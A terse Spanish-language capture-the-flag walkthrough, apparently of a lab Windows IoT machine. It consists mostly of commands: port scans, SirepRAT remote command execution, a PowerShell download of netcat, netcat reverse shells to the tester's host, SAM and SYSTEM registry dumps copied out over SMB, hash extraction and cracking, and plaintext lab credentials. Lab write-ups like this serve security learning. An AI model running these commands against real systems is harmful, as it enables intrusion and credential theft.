nmap -A -p- -oA omni 10.129.2.27 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA omni 10.129.2.27

nmap -sU -O -p- -oA omni-udp 10.129.2.27

nikto -h 10.129.2.27:80

Pasted image 20211102162706.png

Pasted image 20211102162952.png

git clone https://github.com/SafeBreach-Labs/SirepRAT.git

Pasted image 20211102163642.png

python3 SirepRat.py 10.129.2.27 LaunchCommandWithOutput --cmd "C:\Windows\System32\cmd.exe" --args "/c ping 10.10.14.92"

tcpdump -i tun0 icmp -n

Pasted image 20211102171101.png

Bajamos netcat para windows

https://github.com/vinsworldcom/NetCat64/releases/

Pasted image 20211102173603.png

https://github.com/api0cradle/UltimateAppLockerByPassList

https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md

Escogemos esta ruta

C:\Windows\System32\spool\drivers\color

No funciono

Pasted image 20211102180315.png

python3 SirepRat.py 10.129.2.27 LaunchCommandWithOutput --cmd "powershell" --args "/c iwr -uri http://10.10.14.92/nc64.exe -OutFile C:\Windows\System32\spool\drivers\color\nc64.exe"

python3 -m http.server 80

Pasted image 20211102180604.png

python3 SirepRat.py 10.129.2.27 LaunchCommandWithOutput --cmd "C:\Windows\System32\cmd.exe" --args "/c C:\Windows\System32\spool\drivers\color\nc64.exe -e cmd 10.10.14.92 443"

nc -lvnp 443

Pasted image 20211102180837.png

echo %USERNAME%

Para buscar el archivo usamos esto en windows

dir /r /s user.txt

Pasted image 20211102181412.png

powershell

(Import-CliXml -Path user.txt)

Pasted image 20211102181838.png

Para ver accesos de archivo

icacls user.txt

Pasted image 20211102182029.png

reg save HKLM\system system.backup

reg save HKLM\sam sam.backup

Pasted image 20211102182227.png

python3 /opt/impacket/examples/smbserver.py smbFolder $(pwd) -smb2support -username cu3rv0x -password password123

use x: \\10.10.14.92\smbFolder /user:cu3rv0x password123

Pasted image 20211102182748.png

copy sam.backup x:\sam

copy system.backup x:\system

Pasted image 20211102183000.png

python3 /opt/impacket/examples/secretesdump.py -sam sam -system system LOCAL

Pasted image 20211102183307.png

john hash --wordlist=/usr/share/wordlists/rockyou.txt --format=NT

Pasted image 20211102184023.png

http://10.129.2.27:8080

credenciales: app:mesh5143

Pasted image 20211102184453.png

C:\Windows\System32\spool\drivers\color\nc64.exe -e cmd 10.10.14.92 443

nc -lvnp 443

Pasted image 20211102184956.png

powershell

(Import-CliXml -Path user.txt).GetNetworkCredential().password

Pasted image 20211102185617.png

(Import-CliXml -Path iot-admin.xml).GetNetworkCredential().password

Pasted image 20211102190151.png

http://10.129.2.27:8080

credenciales: administrator:_1nt3rn37ofTh1nGz

Pasted image 20211102190529.png

C:\Windows\System32\spool\drivers\color\nc64.exe -e cmd 10.10.14.92 443

nc -lvnp 443

Pasted image 20211102190848.png

(Import-CliXml -Path root.txt).GetNetworkCredential().password

Pasted image 20211102191157.png

boxes

copyright©2022 Cu3rv0x all rights reserved